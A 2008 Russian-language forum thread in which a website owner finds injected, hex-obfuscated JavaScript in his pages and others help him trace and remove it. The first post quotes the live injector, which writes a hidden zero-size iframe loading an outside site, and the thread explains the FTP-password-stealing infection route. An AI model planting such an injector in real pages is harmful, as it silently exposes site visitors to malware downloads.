Скрипт появился...

[Langly 7]

Заметил вверху страницы, при просмотре HTML кода, вот это... Подскажите пожалуйста, что это???

<script type="text/javascript">function ahpgxusvlwuzz(skusjits){var fgdxbotv="";for(uknzaxauyi=0;uknzaxauyi

<skusjits.length;uknzaxauyi+=2){fgdxbotv+=(String.fromCharCode(parseInt(skusjits.substr(uknzaxauyi,2),16)));}document.write(fgdxbotv);}

ahpgxusvlwuzz"3C696672616D65207372633D22687474703A2F2F746F703130302D636F756E7465722E636F6D

2F746F703130302F696E6465782E70687022206672616D65626F726465723D22302220626F726465

723D2230222077696474683D22302

2206865696768743D223022207374796C653D22706F736974696F6E3A206162736F6C7574653B207

669736962696C6974793A2068696464656E3B

20646973706C61793A206E6F6E65223E3C2F696672616D653E");</script>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

Изменено 19 марта 2008 пользователем Langly

[SiMuS 0]

Если ты сам этого не добавлял, то меняй пароли на фтп, обращайся к хостеру. Это вирус скорее всего.

[Langly 7]

Если ты сам этого не добавлял, то меняй пароли на фтп, обращайся к хостеру. Это вирус скорее всего.

Откуда он мог появиться?

То есть возможные пути проникновения.

[SiMuS 0]

1. троян на твоем компе - украдены пароли от фтп - залито по фтп
   
2. взломан комп хостера - украдены пароли от фтп- залито по фтп
   
3. троян на твоем компе - узнаны пароли от админки - добавлена запись в шаблоны
   
4. дал кому то пароли от админки - добавлена запись в шаблоны
   
5. не установил баг-фиксы - взломана админка - добавлена запись в шаблоны
   

Изменено 19 марта 2008 пользователем SiMuS

[Langly 7]

1. троян на твоем компе - украдены пароли от фтп - залито по фтп
   
2. взломан комп хостера - украдены пароли от фтп- залито по фтп
   
3. троян на твоем компе - узнаны пароли от админки - добавлена запись в шаблоны
   
4. дал кому то пароли от админки - добавлена запись в шаблоны
   
5. не установил баг-фиксы - взломана админка - добавлена запись в шаблоны
   

А почему антивирус пишет "подозрительных объектов не обнаружено"?

Куды бечь? Что делать -то? Если я его найду в шаблонах и удалю, это решит проблему? Как быть уверенным в том, что ничего нигде не осталось?

И как искать? Может он разбросан кусками по разным местам...

P.S.Я его найти не могу... где, и самое главное, как искать?Подскажите пожалуйста.

Изменено 19 марта 2008 пользователем Langly

[empirator 0]

Насчет где - большая вероятность, что index.php или engine.php. Сторонние модули ставил? Есть реклама на сайте?

Изменено 19 марта 2008 пользователем empirator

[Langly 7]

Насчет где - большая вероятность, что index.php или engine.php. Сторонние модули ставил? Есть реклама на сайте?

Реклама-то есть. Но она есть давно, а эта хрень сегодня с утра появилась.

Началось с того, что касперыч заверещал, когда я сайт открывал:

обнаружено: троянская программа Trojan-Downloader.JS.Agent.iz Скрипт: http://endem.ru/[1]

обнаружено: троянская программа Trojan-Downloader.JS.Psyme.mf Скрипт: http://endem.ru/[3]

После, ни одного визга от него не было и сейчас нет. Заткнулся и молчит.

А скрипт этот висит в самом верху страницы, при просмотре HTML его видно... Шаблон открываю - там нет.

Проверка сайта, его антивирусом из админки, ничего не дает...

[celsoft 5 986]

Langly,

файл index.php проверьте

[Langly 7]

Langly,

файл index.php проверьте

Не могу попасть на сервер...

[Langly 7]

Вот что хостер мне написал:

Здравствуйте!

В сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct

(возможны другия названия), распространяющий себя через веб-сайты.

Схема заражения довольно проста: достаточно зайти на зараженный сайт и

при стандартных настройках безопасности браузера, вирус автоматически

установится на компьютере пользователя. После этого он начинает

отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав

определенное количество паролей, запускается специальная программа,

которая подключается по FTP к каждому сайту и встраивает в начало или

конец страниц собственный html-код.

Обращаем внимание, что в интернете можно встретить обсуждение данной

проблемы, где в качестве причин заражения указываются различные

бесплатные "движки" (phpBB и т.д.), либо наличие уязвимостей у

хостинг-провайдеров. Со своей стороны можем заверить, что вирус

распространяется только способом, описанным в этом письме, и его

появление не связано с проблемами безопасности на сервере.

В случае обнаружения следов вируса необходимо выполнить следующие

действия с обязательным соблюдением порядка:

1. Проверить нет ли чужих скриптов на ftp

2. Удалить все лишние коды iframe и javascript со страниц

3. Сменить ftp-клиент и браузер. Поставить новые версии, скаченные с

сайтов-производителей.

4. Поставить фаервол

5. Сменить все пароли

6. Не сохранять пароли в программах на комьютере. Вводить каждый раз.

Какой пароль для входа Вы используете?

[Langly 7]

Я заменил файлы index.php и engine.php

Толку нет. Как висела эта дрянь так и висит.

Какие файлы заменить? Где эта гадость может быть? И как искать?

[celsoft 5 986]

Langly

перезалейте все файлы дистрибутива в папке /engine/

[Langly 7]

Делаю...

Вот что я увидел в процессе: в папке public_html/engine/cache/ нет файла .htaccess

Я его туда закачиваю, а он не появляется. При закачке пишет, что такой файл уже есть, но я его не вижу...

что это? Спанель глючит, или результат деятельности этого вируса?

[celsoft 5 986]

Спанель глючит, или результат деятельности этого вируса?

это особенности сервера, к вирусу никакого отношения не имеет

[WMDrakon 20]

Langly,

может стоит включить показ скрытых файлов на сервере?

Мой ответ уже не актуален))))

[Langly 7]

Все, чисто.

Слава богу. Вот дрянь какая...

Что мне теперь делать? Кроме смены паролей, ессно.

[Danila 8]

Все, чисто.

Слава богу. Вот дрянь какая...

Что мне теперь делать? Кроме смены паролей, ессно.

Антивирусом еще раз провериться

[SiMuS 0]

и spybot'ом просканиться

[Langly 7]

Антивирус ее изначально не увидел.

Кстати, Celsoft, почему?

Имею в виду штатный антивирь из админпанели.

и spybot'ом просканиться

А это как?

Где-то есть сервис? Ссылочку можно?

[ShVad 2]

Имею в виду штатный антивирь из админпанели.

Он проверяет на файлы!

[celsoft 5 986]

Антивирус ее изначально не увидел.

нужно делать снимок файлов, чтобы отслеживать изменения.

[Langly 7]

Антивирус ее изначально не увидел.

нужно делать снимок файлов, чтобы отслеживать изменения.

Где об этом поподробнее почитать?

Снимок, допустим сделал. А дальше? Как его сравнивать, проверять? И если нашел различия, что делать и как, после?

[celsoft 5 986]

Если вы сделали снимок то антивирус автоматически сверяет со снимком, если в каком либо файле произойдут малейшие изменения, то антивирус покажет какой из файлов не соответствует сделанному снимку. Например попробуйте отредактировать любой из файлов скрипта и сохраните, после этого запустите проверку антивирусом.

[Langly 7]

Если вы сделали снимок то антивирус автоматически сверяет со снимком, если в каком либо файле произойдут малейшие изменения, то антивирус покажет какой из файлов не соответствует сделанному снимку. Например попробуйте отредактировать любой из файлов скрипта и сохраните, после этого запустите проверку антивирусом.

Угу, спасибо. Посмотрим.

[warning85 0]

Я заменил все файлы из папки engine и теперь написано что движок не установлен наберите --_dk-kapotja.ru/install.php_--

Что делать, помогите, порно достало уже!